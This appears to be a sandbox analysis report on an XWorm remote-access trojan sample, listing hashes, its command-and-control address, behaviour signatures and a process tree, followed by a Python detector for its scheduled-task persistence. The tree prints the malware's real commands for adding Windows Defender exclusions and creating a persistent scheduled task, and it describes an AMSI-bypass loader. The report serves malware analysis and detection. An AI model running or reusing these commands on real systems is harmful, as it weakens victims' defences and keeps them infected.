Overview  (score 10)
Static  (score 10)

Behavioral tasks by sample and platform, with score:
fr2nnk.exe     windows10-1703-x64   10
fr2nnk.exe     windows7-x64         10
fr2nnk.exe     windows10-2004-x64   10
fr2nnk.exe     windows11-21h2-x64   10
grab.exe       windows10-1703-x64   10
grab.exe       windows7-x64          7
grab.exe       windows10-2004-x64    8
grab.exe       windows11-21h2-x64    8
m2zen.exe      windows10-1703-x64    7
m2zen.exe      windows7-x64          7
m2zen.exe      windows10-2004-x64    7
m2zen.exe      windows11-21h2-x64    7
winhlp32.exe   windows10-1703-x64   10
winhlp32.exe   windows7-x64         10
winhlp32.exe   windows10-2004-x64   10
winhlp32.exe   windows11-21h2-x64   10

Analysis
max time kernel: 30s
max time network: 27s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 11-05-2024 09:52
Behavioral tasks (task | sample | resource):
behavioral1   | fr2nnk.exe   | win10-20240404-en
behavioral2   | fr2nnk.exe   | win7-20240221-en
behavioral3   | fr2nnk.exe   | win10v2004-20240226-en
behavioral4   | fr2nnk.exe   | win11-20240426-en
behavioral5   | grab.exe     | win10-20240404-en
behavioral6   | grab.exe     | win7-20240221-en
behavioral7   | grab.exe     | win10v2004-20240426-en
behavioral8   | grab.exe     | win11-20240508-en
behavioral9   | m2zen.exe    | win10-20240404-en
behavioral10  | m2zen.exe    | win7-20231129-en
behavioral11  | m2zen.exe    | win10v2004-20240508-en
behavioral12  | m2zen.exe    | win11-20240508-en
behavioral13  | winhlp32.exe | win10-20240404-en
behavioral14  | winhlp32.exe | win7-20240419-en
behavioral15  | winhlp32.exe | win10v2004-20240508-en
behavioral16  | winhlp32.exe | win11-20240419-en
General
Target: winhlp32.exe
Size: 205KB
MD5: a83dc22ef14c6b5d96aaee00b10a4973
SHA1: ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
SHA256: 143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
SHA512: 0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
SSDEEP: 6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd

Malware Config
Extracted
Family: xworm
Version: 3.0
C2: 147.185.221.18:41012
Install_directory: %AppData%
install_file: Agent.exe
Signatures

Detect Xworm Payload 2 IoCs
Processes:
resource | yara_rule
C:\Windows\System32\x4L.exe | family_xworm
behavioral13/memory/1676-14-0x00000000009D0000-0x00000000009E8000-memory.dmp | family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes: powershell.EXE
description | pid | process | target process
PID 2080 created 584 | 2080 | powershell.EXE | winlogon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes: powershell.exe, powershell.exe, powershell.exe
pid | process
4912 | powershell.exe
5048 | powershell.exe
4856 | powershell.exe

Drops startup file 2 IoCs
Processes: x4L.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk | x4L.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk | x4L.exe

Executes dropped EXE 2 IoCs
Processes: x4L.exe, x4Shellcode.exe
pid | process
1676 | x4L.exe
656 | x4Shellcode.exe

Adds Run key to start application 2 TTPs 1 IoCs
Processes: x4L.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4L = "C:\\Users\\Admin\\AppData\\Roaming\\x4L.exe" | x4L.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | ip-api.com

Drops file in System32 directory 7 IoCs
Processes: winhlp32.exe, powershell.EXE, svchost.exe
description | ioc | process
File created | C:\Windows\System32\x4L.exe | winhlp32.exe
File opened for modification | C:\Windows\System32\x4L.exe | winhlp32.exe
File created | C:\Windows\System32\x4Shellcode.exe | winhlp32.exe
File opened for modification | C:\Windows\System32\x4Shellcode.exe | winhlp32.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\x4L | svchost.exe

Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.EXE
description | pid | process | target process
PID 2080 set thread context of 4424 | 2080 | powershell.EXE | dllhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.

Delays execution with timeout.exe 1 IoCs
Processes: timeout.exe
pid | process
1588 | timeout.exe
Modifies data under HKEY_USERS 42 IoCs
Processes: powershell.EXE
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\<store>, plus <store>\Certificates, <store>\CRLs and <store>\CTLs, for each of the stores CA, Root, TrustedPeople, trust, Disallowed and SmartCardRoot (24 keys) | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\<store>, plus <store>\Certificates, <store>\CRLs and <store>\CTLs, for each of the stores CA, TrustedPeople, trust and Disallowed (16 keys) | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.EXE, dllhost.exe, powershell.exe, powershell.exe
pid | process | number of entries
2080 | powershell.EXE | 4
4424 | dllhost.exe | 53
4912 | powershell.exe | 4
5048 | powershell.exe | 3
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: winhlp32.exe, x4L.exe, powershell.EXE, dllhost.exe, powershell.exe, svchost.exe
pid | process | privileges adjusted (Token:)
2772 | winhlp32.exe | SeDebugPrivilege
1676 | x4L.exe | SeDebugPrivilege
2080 | powershell.EXE | SeDebugPrivilege (2 entries)
4424 | dllhost.exe | SeDebugPrivilege
4912 | powershell.exe | SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (22 entries)
2204 | svchost.exe | SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege; this 12-privilege sequence appears three times, followed by one more SeAssignPrimaryTokenPrivilege (37 entries)

Suspicious use of SetWindowsHookEx 1 IoCs
Processes: x4L.exe
pid | process
1676 | x4L.exe

Suspicious use of WriteProcessMemory 64 IoCs
Processes: winhlp32.exe, cmd.exe, powershell.EXE, dllhost.exe
description | pid | process | target process | number of entries
PID 2772 wrote to memory of 1676 | 2772 | winhlp32.exe | x4L.exe | 2
PID 2772 wrote to memory of 656 | 2772 | winhlp32.exe | x4Shellcode.exe | 3
PID 2772 wrote to memory of 2508 | 2772 | winhlp32.exe | cmd.exe | 2
PID 2508 wrote to memory of 1588 | 2508 | cmd.exe | timeout.exe | 2
PID 2080 wrote to memory of 4424 | 2080 | powershell.EXE | dllhost.exe | 8
PID 4424 wrote to memory of 584 | 4424 | dllhost.exe | winlogon.exe | 1
PID 4424 wrote to memory of 640 | 4424 | dllhost.exe | lsass.exe | 1
PID 4424 wrote to memory of 992 | 4424 | dllhost.exe | dwm.exe | 1
PID 4424 wrote to memory of 2032 | 4424 | dllhost.exe | spoolsv.exe | 1
PID 4424 wrote to memory of 2676 | 4424 | dllhost.exe | sihost.exe | 1
PID 4424 wrote to memory of 2732 | 4424 | dllhost.exe | sysmon.exe | 1
PID 4424 wrote to memory of 2908 | 4424 | dllhost.exe | taskhostw.exe | 1
PID 4424 wrote to memory of 2980 | 4424 | dllhost.exe | unsecapp.exe | 1
PID 4424 wrote to memory of 3432 | 4424 | dllhost.exe | Explorer.EXE | 1
PID 4424 wrote to memory of 3980 | 4424 | dllhost.exe | RuntimeBroker.exe | 1
PID 4424 wrote to memory of 1836 | 4424 | dllhost.exe | DllHost.exe | 1
PID 4424 wrote to memory of each of 728, 908, 344, 488, 1028, 1044, 1120, 1244, 1260, 1284, 1308, 1320, 1388, 1468, 1500, 1560, 1568, 1656, 1668, 1756, 1764, 1904, 1948, 1848, 2204, 2244, 2444, 2452, 2484, 2668, 2704, 2748, 2792, 2808, 3268, 4920 | 4424 | dllhost.exe | svchost.exe | 36 (one per target PID)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indented by depth in the process tree; the image path is given in brackets where the command line does not already show it; signature hits are listed under each process)

winlogon.exe  [C:\Windows\system32\winlogon.exe]
  "dwm.exe"  [C:\Windows\system32\dwm.exe]
  C:\Windows\System32\dllhost.exe /Processid:{3c93cbca-c388-412d-9e86-0a98270fdb6b}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
  - Drops file in System32 directory
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}  [c:\windows\system32\taskhostw.exe]
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nDUStEyOEoDE{ ... }"  (long character-obfuscated script: resolves LoadLibraryA, GetProcAddress and VirtualProtect through reflection, overwrites the start of AmsiScanBuffer in amsi.dll, then loads and invokes a .NET assembly read from the registry value HKLM\SOFTWARE\x4stager)
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\x4L.exe"C:\Windows\System32\x4L.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
(depth 5) C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
(depth 4) C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"
    - Creates scheduled task(s)
-
(depth 5) C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
(depth 3) C:\Windows\System32\x4Shellcode.exe
    "C:\Windows\System32\x4Shellcode.exe"
    - Executes dropped EXE
-
(depth 3) C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7FAF.tmp.bat""
    - Suspicious use of WriteProcessMemory
-
(depth 4) C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
(depth 4) C:\Windows\system32\timeout.exe
    timeout 3
    - Delays execution with timeout.exe
-
(depth 1) C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
-
(depth 1) C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
(depth 1) c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localservice -s CDPSvc
-
(depth 1) c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
-
(depth 1) C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
-
(depth 1) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
-
(depth 1) c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
-
(depth 1) C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
(depth 1) C:\Windows\system32\ApplicationFrameHost.exe
    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
-
(depth 1) C:\Windows\System32\InstallAgent.exe
    C:\Windows\System32\InstallAgent.exe -Embedding
-
(depth 1) C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
-
(depth 1) C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
-
(depth 1) C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
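The schtasks / cmd / timeout sequence in the tree above (a task named x4L that relaunches x4L.exe from the user's Roaming folder every minute with the highest run level, next to cmd.exe running a .bat staged in Temp and a timeout delay) is a routine persistence-and-staging pattern. As an added example, not code from the sandbox report or from the sample, here is detection logic that matches process-creation command lines (Sysmon event 1 or EDR telemetry style) against that pattern. The sample lines are constructed from the command lines shown above plus one benign control task; the thresholds (minute cadence of five or fewer) are the author's choice.

```python
"""Match process command lines against the scheduled-task persistence pattern above.

Added example for readers of the report, not part of the sandbox output.
The SAMPLE_EVENTS list is constructed from the command lines in the
process tree plus one benign control (a daily task under Program Files).
"""
import re

SAMPLE_EVENTS = [
    # Constructed from the report: minute-interval task relaunching a Roaming payload.
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
    r'/tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"',
    # Constructed from the report: cmd.exe executing a batch file dropped in Temp.
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7FAF.tmp.bat""',
    "timeout 3",
    r"C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}",
    # Benign control (constructed): daily task, action under Program Files, no /f, no /RL.
    r'"C:\Windows\System32\schtasks.exe" /create /tn "AcmeBackup" /sc daily /st 02:00 '
    r'/tr "C:\Program Files\Acme\backup.exe"',
]

USER_APPDATA = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)
TEMP_BAT = re.compile(r"\\AppData\\Local\\Temp\\[^\"\s]+\.bat\b", re.I)


def _arg(cmdline, switch):
    """Value following a schtasks switch (e.g. /tr), with surrounding quotes removed."""
    pattern = r"(?<!\S)" + re.escape(switch) + r"\s+(\"[^\"]*\"|\S+)"
    m = re.search(pattern, cmdline, re.I)
    return m.group(1).strip('"') if m else None


def schtasks_findings(cmdline):
    """Reasons a schtasks /create command line resembles the observed persistence task.

    Returns an empty list for non-schtasks lines and for tasks that show none of
    the traits; callers can threshold on the number of reasons.
    """
    if not re.search(r"schtasks(\.exe)?\"?\s", cmdline, re.I):
        return []
    if not re.search(r"(?<!\S)/create(?!\S)", cmdline, re.I):
        return []
    reasons = []
    action = _arg(cmdline, "/tr") or ""
    if USER_APPDATA.search(action):
        reasons.append("task action lives under a user AppData path: " + action)
    schedule = (_arg(cmdline, "/sc") or "").lower()
    modifier = _arg(cmdline, "/mo")
    try:
        every = int(modifier) if modifier else 1  # schtasks defaults /mo to 1
    except ValueError:
        every = None
    if schedule == "minute" and every is not None and every <= 5:
        reasons.append("fires every %d minute(s), a relaunch/beacon cadence" % every)
    if (_arg(cmdline, "/rl") or "").lower() == "highest":
        reasons.append("requests the highest run level (/RL HIGHEST)")
    if re.search(r"(?<!\S)/f(?!\S)", cmdline, re.I):
        reasons.append("silently overwrites any existing task of that name (/f)")
    return reasons


def temp_batch_finding(cmdline):
    """Flag cmd.exe /c executing a batch file from the user's Temp directory, else None."""
    if not re.search(r"(?:^|\\)cmd(?:\.exe)?\"?\s+/c(?!\S)", cmdline, re.I):
        return None
    m = TEMP_BAT.search(cmdline)
    if not m:
        return None
    return "cmd.exe runs a batch file staged in Temp: " + m.group(0)


def scan(cmdlines):
    """Return [(event_index, finding_text), ...] over a list of process command lines."""
    findings = []
    for i, cmd in enumerate(cmdlines):
        for reason in schtasks_findings(cmd):
            findings.append((i, reason))
        batch = temp_batch_finding(cmd)
        if batch:
            findings.append((i, batch))
    return findings


if __name__ == "__main__":
    for idx, text in scan(SAMPLE_EVENTS):
        print(f"[event {idx}] {text}")
```

Only the two constructed lines taken from the report produce findings; the benign daily task and the ordinary COM/timeout lines produce none. In production the schtasks hits are worth correlating with the parent process (here an unsigned dropped executable rather than an installer) before alerting on a single trait such as /f alone.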
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize 3KB
    MD5    8592ba100a78835a6b94d5949e13dfc1
    SHA1   63e901200ab9a57c7dd4c078d7f75dcd3b357020
    SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
    SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 1KB
    MD5    e17c9e56f54fd40c47e128741ffb77e3
    SHA1   714e2b000c168ca9dcdf2887ccf82e4494e058cc
    SHA256 b14046c78530a73a7dec1fac039d44693d5fd0fce7d6515c21fe646cd58df17c
    SHA512 e58eb04c5cefe6474b7699ef2add288aba0a8127c81dfd3f4be6dad7b90f3af93a8c96f5d99dbc8df9d6b88347e892225ba0e528673d585209d773240379a37a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 1KB
    MD5    3c1a969865f69f3c4d7900237eb53edf
    SHA1   7f380a06239142fb9092f67a145cb343577cd211
    SHA256 f2f0972f48e2b16c38ab6faa526c6c1e0b23f2685d9db139735092ab79219b12
    SHA512 aa42eefb54ab76a7773b6ff312450d2615c5bf879942f16e2bf2b3ccbb7605b21fcad095258a72571fc3399d2d9b8da04f70f9c79c776188e678dcb7d1abb932
-
C:\Users\Admin\AppData\Local\Temp\tmp7FAF.tmp.bat
    Filesize 160B
    MD5    9fe35ff2c475ab06e8a218dc6a49b8fd
    SHA1   9ed4f0001110869f80cd6ed9d12c2f4f620d4960
    SHA256 a383268390c816e6ae53192a2f638099b16f40c444b8d6dcb5d5d180c9afca7c
    SHA512 34283cfa9cd34d80b37695b3c31565e450dd4dd13bba4a44a932c5410f6c112fed572f3cfa324f6ad8c2f37e22e7237818cf8914f3bef1355acf63f7707ae169
-
C:\Windows\System32\x4L.exe
    Filesize 68KB
    MD5    9ecdf1a7818f7e9952b6041e3aa19b7a
    SHA1   93a8357036356c1c1e20a5cf69fdbad877ce8a0f
    SHA256 0771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4
    SHA512 847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853
-
C:\Windows\System32\x4Shellcode.exe
    Filesize 164KB
    MD5    8a7bee2c8cec6ac50bc42fe03d3231e6
    SHA1   ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
    SHA256 c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
    SHA512 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5
-
C:\Windows\Temp\__PSScriptPolicyTest_nqongnxe.zqu.ps1
    Filesize 1B
    MD5    c4ca4238a0b923820dcc509a6f75849b
    SHA1   356a192b7913b04c54574d18c28d46e6395428ab
    SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
    (These are the hashes of the single character "1". PowerShell itself writes a __PSScriptPolicyTest_*.ps1 probe to %WINDIR%\Temp at startup to test the machine's script enforcement policy, so this entry is evidence that PowerShell ran, not a file authored by the sample.)
Memory dumps (process id, dump sequence, address range, size):
- memory/584-63-0x00000272AB210000-0x00000272AB236000-memory.dmp 152KB
- memory/584-64-0x00000272AB240000-0x00000272AB26C000-memory.dmp 176KB
- memory/584-72-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp 64KB
- memory/584-71-0x00000272AB240000-0x00000272AB26C000-memory.dmp 176KB
- memory/584-65-0x00000272AB240000-0x00000272AB26C000-memory.dmp 176KB
- memory/640-83-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp 64KB
- memory/640-76-0x0000024E7AD10000-0x0000024E7AD3C000-memory.dmp 176KB
- memory/640-82-0x0000024E7AD10000-0x0000024E7AD3C000-memory.dmp 176KB
- memory/728-94-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp 64KB
- memory/728-87-0x000002C5325D0000-0x000002C5325FC000-memory.dmp 176KB
- memory/728-93-0x000002C5325D0000-0x000002C5325FC000-memory.dmp 176KB
- memory/908-98-0x0000022578C30000-0x0000022578C5C000-memory.dmp 176KB
- memory/908-104-0x0000022578C30000-0x0000022578C5C000-memory.dmp 176KB
- memory/908-105-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmp 64KB
- memory/992-109-0x000001D0EFC00000-0x000001D0EFC2C000-memory.dmp 176KB
- memory/1676-18-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp 9.9MB
- memory/1676-14-0x00000000009D0000-0x00000000009E8000-memory.dmp 96KB
- memory/1676-960-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp 9.9MB
- memory/1676-961-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp 9.9MB
- memory/2080-28-0x000001F27E620000-0x000001F27E696000-memory.dmp 472KB
- memory/2080-47-0x00007FFE9D460000-0x00007FFE9D63B000-memory.dmp 1.9MB
- memory/2080-48-0x00007FFE9AA30000-0x00007FFE9AADE000-memory.dmp 696KB
- memory/2080-25-0x000001F27E460000-0x000001F27E482000-memory.dmp 136KB
- memory/2080-46-0x000001F27E7A0000-0x000001F27E7CA000-memory.dmp 168KB
- memory/2772-1-0x00000000004F0000-0x000000000052A000-memory.dmp 232KB
- memory/2772-2-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp 9.9MB
- memory/2772-19-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmp 9.9MB
- memory/2772-0-0x00007FFE8F503000-0x00007FFE8F504000-memory.dmp 4KB
- memory/4424-49-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
- memory/4424-52-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
- memory/4424-57-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
- memory/4424-51-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
- memory/4424-50-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
- memory/4424-60-0x0000000140000000-0x0000000140008000-memory.dmp 32KB
- memory/4424-58-0x00007FFE9D460000-0x00007FFE9D63B000-memory.dmp 1.9MB
- memory/4424-59-0x00007FFE9AA30000-0x00007FFE9AADE000-memory.dmp 696KB